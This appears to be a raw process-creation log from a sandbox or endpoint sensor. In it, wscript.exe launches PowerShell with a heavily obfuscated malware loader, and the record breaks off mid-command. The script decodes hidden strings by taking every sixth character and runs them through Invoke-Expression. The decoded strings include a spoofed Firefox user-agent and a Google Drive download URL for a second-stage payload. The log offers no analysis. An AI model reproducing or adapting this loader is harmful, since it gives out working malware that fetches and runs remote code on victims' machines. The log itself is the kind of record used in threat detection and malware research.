Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. 
J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSa |